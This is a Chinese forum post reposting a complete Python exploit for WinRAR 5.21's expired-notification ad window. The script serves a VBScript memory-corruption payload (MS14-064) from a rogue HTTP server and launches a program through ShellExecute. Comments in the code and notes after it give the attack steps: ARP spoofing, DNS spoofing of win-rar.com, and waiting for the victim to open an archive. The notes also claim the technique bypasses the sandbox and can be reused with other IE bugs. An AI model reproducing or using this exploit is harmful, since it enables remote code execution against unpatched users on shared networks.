exp:
[AppleScript] 纯文本查看 复制代码 #!/usr/bin/python -w
# Title : WinRar Expired Notification - OLE Remote Command Execution
# Date : 30/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
# This exploits a vulnerability in the implementation of showing ads.
# When a user opens any WINRAR file sometimes
# A window with Expired Notification title loads http://www.win-rar.com/notifier/
# reminding user to buy winrar to remove ads.
# Since this uses a http connection we can use Man In The Middle attack
# to gain Remote Code Execution
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) arpspoof the target
# 3) dnsspoof www.win-rar.com to point to your IP
# 4) Wait for the victim to open WinRar files.
#
# Video : https://youtu.be/h976wFlHGw4
#
# i hope this time the "great security researcher" Mohammad Reza Espargham
# me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit .....
#
# http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015
# http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015
#
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
print " [+] WinRar (Free Version) - Remote Command Execution [+]\n"
import socket
CRLF = "\r\n"
#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin()
function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else
exit function
end if
win9x=0
BeginInit()
If Create()=True Then
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE")
document.write(intVersion)
runshellcode()
else
setnotsafemode()
end if
end if
end function
function BeginInit()
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
end function
function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
Create=True
Exit For
End If
Next
end function
sub testaa()
end sub
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
function setnotsafemode()
On Error Resume Next
i=mydata()
i=rum(i+8)
i=rum(i+16)
j=rum(i+&h134)
for k=0 to &h60 step 4
j=rum(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)
j=0
j=rum(i+&h120+k)
Exit for
end if
next
ab(2)=1.69759663316747E-313
runmumaa()
end function
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function
end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If
redim Preserve aa(a0)
end function
function rum(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rum=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
</script>
</body>
</html>"""
response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input(" Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "\n[+] Server started " + host + " [+]"
sock.listen(1)
print "\n[+] Waiting for request . . . [+]"
print "\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]"
connection, client_address = sock.accept()
while True:
connection.recv(2048)
print "[+] Got request , sending exploit . . .[+]"
connection.send(exploit)
print "[+] Exploit sent , A calc should pop up . . [+]"
print "\nhttps://www.infogen.al/\n"
exit(0)
# 0day.today [2015-10-15] #
保存为python脚本
arpspoof目标主机
再dns欺骗目标主机
目标主机打开winrar即可触发
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓继续↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
可能有些朋友注意到了。里面用到了14年一个漏洞
ms14-064漏洞
所以这个触发条件
1:在局域网可劫持环境
2:没打ms14-064补丁
-------------------------------------------------------------------------
当然,为什么这样做。其实涉及到一个沙箱机制
而这样 恰恰就绕过了这个沙箱 导致打开直接触发
当然了 当有类似IE漏洞出现 同样可以利用这个来绕过沙箱
原帖地址:http://www.sadboy.org/forum.php?mod=viewthread&tid=418&extra= | 
发表于 2015-10-17 22:03:38
